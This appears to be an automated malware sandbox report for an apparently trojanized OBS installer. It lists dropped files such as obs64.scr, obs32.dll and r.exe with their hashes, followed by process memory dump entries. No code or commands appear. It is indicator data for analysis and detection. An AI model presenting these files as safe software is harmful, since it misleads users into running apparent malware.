9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-AGIJ5.tmp\_isetup\_shfoldr.dll
Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\_isetup\_shfoldr.dll
Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\_isetup\_shfoldr.dll
Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
\Users\Admin\AppData\Local\Temp\is-DHJLM.tmp\obs64.tmp
Filesize
1.4MB

MD5
d50a6bdcf37d093fc472fcbb6489069a

SHA1
d3f5d6892e4ce3018f8cf441021ace1d9a5b8732

SHA256
4252ef0ec82de8b6634f1b873cbd0a73193bd64dd49cf36f598940817835e10e

SHA512
8304e0211c2f6c96c3d5836175146a6f66a4deba32678e4da6df1715086c19ff6906f48621c472be0247ebd7f18851fc63f72d0657c6b686e1ae9d616c088a4e

Download Submit
\Users\Admin\AppData\Local\Temp\is-GA578.tmp\t2_sup5.tmp
Filesize
1.4MB

MD5
a24e73bcea94f3a5f6ce6034dc01e3b3

SHA1
7d44374441a69acb8d29fbfc25e786dbbcab4139

SHA256
118ec78c15f55fb81f6cfc2d2c62268097af3a00cd3d18f1dc30ff4ce06cd44e

SHA512
f05f3fc002cfe2b98ebfebde5c0cb64e436bec9fe6cc1e3cc77fe6505d5ba08e349ed509fd3026a4e1f56d4a1d57e9c108da99740e003b8683d8a460da3a849c

Download Submit
\Users\Admin\AppData\Local\Temp\is-GTGTV.tmp\t2_sup5.tmp
Filesize
1.4MB

MD5
a24e73bcea94f3a5f6ce6034dc01e3b3

SHA1
7d44374441a69acb8d29fbfc25e786dbbcab4139

SHA256
118ec78c15f55fb81f6cfc2d2c62268097af3a00cd3d18f1dc30ff4ce06cd44e

SHA512
f05f3fc002cfe2b98ebfebde5c0cb64e436bec9fe6cc1e3cc77fe6505d5ba08e349ed509fd3026a4e1f56d4a1d57e9c108da99740e003b8683d8a460da3a849c

Download Submit
\Users\Admin\AppData\Local\Temp\is-H3I5K.tmp\obs64.tmp
Filesize
1.4MB

MD5
d50a6bdcf37d093fc472fcbb6489069a

SHA1
d3f5d6892e4ce3018f8cf441021ace1d9a5b8732

SHA256
4252ef0ec82de8b6634f1b873cbd0a73193bd64dd49cf36f598940817835e10e

SHA512
8304e0211c2f6c96c3d5836175146a6f66a4deba32678e4da6df1715086c19ff6906f48621c472be0247ebd7f18851fc63f72d0657c6b686e1ae9d616c088a4e

Download Submit
\tmp\obs32.dll
Filesize
6.6MB

MD5
0fe444048a4000a3bca0da179b50dc6c

SHA1
4aad3c1318e26e1a4adb26e52cba3699492ea1e3

SHA256
a57d81a4e4f3f7c34c0ce5fe1b5e397ff96f857ba6c1b1aef235401f6ffd5261

SHA512
c164d85ae70fb034062ba4b8521205a2e639f9ad54f883839fb60a2c9c772e89326cad4950d08ec1736d8a555e23d27ae88079fdb5caf0758fe87c74738601ab

Download Submit
\tmp\obs32.dll
Filesize
6.6MB

MD5
0fe444048a4000a3bca0da179b50dc6c

SHA1
4aad3c1318e26e1a4adb26e52cba3699492ea1e3

SHA256
a57d81a4e4f3f7c34c0ce5fe1b5e397ff96f857ba6c1b1aef235401f6ffd5261

SHA512
c164d85ae70fb034062ba4b8521205a2e639f9ad54f883839fb60a2c9c772e89326cad4950d08ec1736d8a555e23d27ae88079fdb5caf0758fe87c74738601ab

Download Submit
\tmp\obs32.dll
Filesize
6.6MB

MD5
0fe444048a4000a3bca0da179b50dc6c

SHA1
4aad3c1318e26e1a4adb26e52cba3699492ea1e3

SHA256
a57d81a4e4f3f7c34c0ce5fe1b5e397ff96f857ba6c1b1aef235401f6ffd5261

SHA512
c164d85ae70fb034062ba4b8521205a2e639f9ad54f883839fb60a2c9c772e89326cad4950d08ec1736d8a555e23d27ae88079fdb5caf0758fe87c74738601ab

Download Submit
\tmp\obs32.dll
Filesize
6.6MB

MD5
0fe444048a4000a3bca0da179b50dc6c

SHA1
4aad3c1318e26e1a4adb26e52cba3699492ea1e3

SHA256
a57d81a4e4f3f7c34c0ce5fe1b5e397ff96f857ba6c1b1aef235401f6ffd5261

SHA512
c164d85ae70fb034062ba4b8521205a2e639f9ad54f883839fb60a2c9c772e89326cad4950d08ec1736d8a555e23d27ae88079fdb5caf0758fe87c74738601ab

Download Submit
\tmp\obs32.dll
Filesize
6.6MB

MD5
0fe444048a4000a3bca0da179b50dc6c

SHA1
4aad3c1318e26e1a4adb26e52cba3699492ea1e3

SHA256
a57d81a4e4f3f7c34c0ce5fe1b5e397ff96f857ba6c1b1aef235401f6ffd5261

SHA512
c164d85ae70fb034062ba4b8521205a2e639f9ad54f883839fb60a2c9c772e89326cad4950d08ec1736d8a555e23d27ae88079fdb5caf0758fe87c74738601ab

Download Submit
\tmp\obs32.dll
Filesize
6.6MB

MD5
0fe444048a4000a3bca0da179b50dc6c

SHA1
4aad3c1318e26e1a4adb26e52cba3699492ea1e3

SHA256
a57d81a4e4f3f7c34c0ce5fe1b5e397ff96f857ba6c1b1aef235401f6ffd5261

SHA512
c164d85ae70fb034062ba4b8521205a2e639f9ad54f883839fb60a2c9c772e89326cad4950d08ec1736d8a555e23d27ae88079fdb5caf0758fe87c74738601ab

Download Submit
\tmp\obs32.dll
Filesize
6.6MB

MD5
0fe444048a4000a3bca0da179b50dc6c

SHA1
4aad3c1318e26e1a4adb26e52cba3699492ea1e3

SHA256
a57d81a4e4f3f7c34c0ce5fe1b5e397ff96f857ba6c1b1aef235401f6ffd5261

SHA512
c164d85ae70fb034062ba4b8521205a2e639f9ad54f883839fb60a2c9c772e89326cad4950d08ec1736d8a555e23d27ae88079fdb5caf0758fe87c74738601ab

Download Submit
\tmp\obs32.dll
Filesize
6.6MB

MD5
0fe444048a4000a3bca0da179b50dc6c

SHA1
4aad3c1318e26e1a4adb26e52cba3699492ea1e3

SHA256
a57d81a4e4f3f7c34c0ce5fe1b5e397ff96f857ba6c1b1aef235401f6ffd5261

SHA512
c164d85ae70fb034062ba4b8521205a2e639f9ad54f883839fb60a2c9c772e89326cad4950d08ec1736d8a555e23d27ae88079fdb5caf0758fe87c74738601ab

Download Submit
\tmp\obs64.exe
Filesize
15.9MB

MD5
315048e1d18f5746ae0417a4278ff3ab

SHA1
c083af385df168dff76f4ad7b6c22acc6314f75f

SHA256
c16c484e87513320b820c9dab9e0bf1eab9d324eee87436cf3b3674fc677fcab

SHA512
2960f7f0fe2a92bf9521360915fd8ec3c1daab0e583f76f973273d62e3dc7c13cfd4dd49025bef86085e81384f25101d0d0d210dd2b321239b8f460b9d2c9468

Download Submit
\tmp\obs64.exe
Filesize
15.9MB

MD5
315048e1d18f5746ae0417a4278ff3ab

SHA1
c083af385df168dff76f4ad7b6c22acc6314f75f

SHA256
c16c484e87513320b820c9dab9e0bf1eab9d324eee87436cf3b3674fc677fcab

SHA512
2960f7f0fe2a92bf9521360915fd8ec3c1daab0e583f76f973273d62e3dc7c13cfd4dd49025bef86085e81384f25101d0d0d210dd2b321239b8f460b9d2c9468

Download Submit
\tmp\obs64.scr
Filesize
15.3MB

MD5
a2e4ea727ac977f1a958d0886f7d354e

SHA1
695705eb4878c240bc957d144d9b9efd71efe2cf

SHA256
d5451fe798542c6a9c054cca84031c5ca9da9696bd8ddd2381f9da9f0520fbf3

SHA512
a95158fad8cfb85281cf428a19899de75f1a26eb63fcf3398f38d50a26f3104d44f56511e1ee11aacd064e558bf6454afb095073a0298a32e472973d5f3cecdc

Download Submit
\tmp\obs64.scr
Filesize
15.3MB

MD5
a2e4ea727ac977f1a958d0886f7d354e

SHA1
695705eb4878c240bc957d144d9b9efd71efe2cf

SHA256
d5451fe798542c6a9c054cca84031c5ca9da9696bd8ddd2381f9da9f0520fbf3

SHA512
a95158fad8cfb85281cf428a19899de75f1a26eb63fcf3398f38d50a26f3104d44f56511e1ee11aacd064e558bf6454afb095073a0298a32e472973d5f3cecdc

Download Submit
memory/340-231-0x0000000000400000-0x0000000002143000-memory.dmp

Filesize
29.3MB

Download
memory/340-230-0x0000000000400000-0x0000000002143000-memory.dmp

Filesize
29.3MB

Download
memory/340-234-0x0000000000400000-0x0000000002143000-memory.dmp

Filesize
29.3MB

Download
memory/340-236-0x0000000000400000-0x0000000002143000-memory.dmp

Filesize
29.3MB

Download
memory/340-255-0x0000000000400000-0x0000000002143000-memory.dmp

Filesize
29.3MB

Download
memory/340-229-0x0000000000400000-0x0000000002143000-memory.dmp

Filesize
29.3MB

Download
memory/340-228-0x0000000000400000-0x0000000002143000-memory.dmp

Filesize
29.3MB

Download
memory/340-227-0x0000000000400000-0x0000000002143000-memory.dmp

Filesize
29.3MB

Download
memory/340-225-0x0000000000400000-0x0000000002143000-memory.dmp

Filesize
29.3MB

Download
memory/340-224-0x0000000000400000-0x0000000002143000-memory.dmp

Filesize
29.3MB

Download
memory/432-128-0x0000000000000000-mapping.dmp

Download
memory/544-247-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/544-258-0x0000000011000000-0x0000000011158000-memory.dmp

Filesize
1.3MB

Download
memory/544-248-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/544-249-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/544-244-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/544-242-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/544-240-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/544-238-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/544-251-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/544-252-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/544-254-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/544-261-0x00000000034B0000-0x0000000003557000-memory.dmp

Filesize
668KB

Download
memory/544-237-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/544-256-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/544-260-0x0000000011000000-0x0000000011158000-memory.dmp

Filesize
1.3MB

Download
memory/544-257-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/544-246-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/544-259-0x00000000034B0000-0x0000000003557000-memory.dmp

Filesize
668KB

Download
memory/552-69-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/552-54-0x0000000075131000-0x0000000075133000-memory.dmp

Filesize
8KB

Download
memory/552-55-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/604-154-0x0000000000000000-mapping.dmp

Download
memory/764-132-0x0000000000000000-mapping.dmp

Download
memory/824-85-0x0000000000000000-mapping.dmp

Download
memory/824-90-0x000007FEF4120000-0x000007FEF4BA0000-memory.dmp

Filesize
10.5MB

Download
memory/824-91-0x000007FEF4120000-0x000007FEF4BA0000-memory.dmp

Filesize
10.5MB

Download
memory/832-134-0x0000000000000000-mapping.dmp

Download
memory/836-123-0x0000000000000000-mapping.dmp

Download
memory/888-78-0x0000000000000000-mapping.dmp

Download
memory/948-108-0x0000000000000000-mapping.dmp

Download
memory/964-176-0x0000000000000000-mapping.dmp

Download
memory/972-113-0x0000000000000000-mapping.dmp

Download
memory/1088-216-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/1088-197-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/1088-193-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/1088-189-0x0000000000000000-mapping.dmp

Download
memory/1112-96-0x0000000000000000-mapping.dmp

Download
memory/1124-124-0x0000000000000000-mapping.dmp

Download
memory/1156-120-0x0000000000000000-mapping.dmp

Download
memory/1160-122-0x0000000000000000-mapping.dmp

Download
memory/1176-151-0x0000000000000000-mapping.dmp

Download
memory/1180-111-0x0000000000000000-mapping.dmp

Download
memory/1184-129-0x0000000000000000-mapping.dmp

Download
memory/1204-182-0x0000000000000000-mapping.dmp

Download
memory/1204-146-0x0000000000000000-mapping.dmp

Download
memory/1224-121-0x0000000000000000-mapping.dmp

Download
memory/1356-126-0x0000000000000000-mapping.dmp

Download
memory/1376-130-0x0000000000000000-mapping.dmp

Download
memory/1380-131-0x0000000000000000-mapping.dmp

Download
memory/1380-93-0x000007FEFB6B1000-0x000007FEFB6B3000-memory.dmp

Filesize
8KB

Download
memory/1472-127-0x0000000000000000-mapping.dmp

Download
memory/1492-117-0x0000000000000000-mapping.dmp

Download
memory/1500-181-0x0000000000000000-mapping.dmp

Download
memory/1500-208-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/1500-212-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/1500-222-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/1528-158-0x0000000000000000-mapping.dmp

Download
memory/1528-125-0x0000000000000000-mapping.dmp

Download
memory/1536-137-0x0000000000000000-mapping.dmp

Download
memory/1536-105-0x0000000000000000-mapping.dmp

Download
memory/1552-133-0x0000000000000000-mapping.dmp

Download
memory/1556-200-0x0000000000000000-mapping.dmp

Download
memory/1556-175-0x0000000000000000-mapping.dmp

Download
memory/1564-94-0x0000000000000000-mapping.dmp

Download
memory/1572-100-0x0000000000000000-mapping.dmp

Download
memory/1572-135-0x0000000000000000-mapping.dmp

Download
memory/1588-184-0x0000000000000000-mapping.dmp

Download
memory/1604-119-0x0000000000000000-mapping.dmp

Download
memory/1612-219-0x0000000073F21000-0x0000000073F23000-memory.dmp

Filesize
8KB

Download
memory/1620-115-0x0000000000000000-mapping.dmp

Download
memory/1640-101-0x0000000000000000-mapping.dmp

Download
memory/1736-174-0x0000000000000000-mapping.dmp

Download
memory/1736-116-0x0000000000000000-mapping.dmp

Download
memory/1760-65-0x0000000000000000-mapping.dmp

Download
memory/1824-118-0x0000000000000000-mapping.dmp

Download
memory/1824-183-0x0000000000000000-mapping.dmp

Download
memory/1828-74-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1828-198-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1828-67-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1828-64-0x0000000000000000-mapping.dmp

Download
memory/1832-104-0x0000000000000000-mapping.dmp

Download
memory/1832-178-0x0000000000000000-mapping.dmp

Download
memory/1904-114-0x0000000000000000-mapping.dmp

Download
memory/1904-148-0x0000000000000000-mapping.dmp

Download
memory/1916-107-0x0000000000000000-mapping.dmp

Download
memory/1924-138-0x0000000000000000-mapping.dmp

Download
memory/1928-63-0x0000000000000000-mapping.dmp

Download
memory/1932-58-0x0000000000000000-mapping.dmp

Download
memory/1948-167-0x0000000000000000-mapping.dmp

Download
memory/1964-106-0x0000000000000000-mapping.dmp

Download
memory/1980-112-0x0000000000000000-mapping.dmp

Download
memory/1980-186-0x0000000000000000-mapping.dmp

Download
memory/1996-190-0x0000000000000000-mapping.dmp

Download
memory/2004-109-0x0000000000000000-mapping.dmp

Download
memory/2012-71-0x0000000000000000-mapping.dmp

Download
memory/2012-77-0x0000000073F51000-0x0000000073F53000-memory.dmp

Filesize
8KB

Download
memory/2016-110-0x0000000000000000-mapping.dmp

Download
memory/2020-143-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads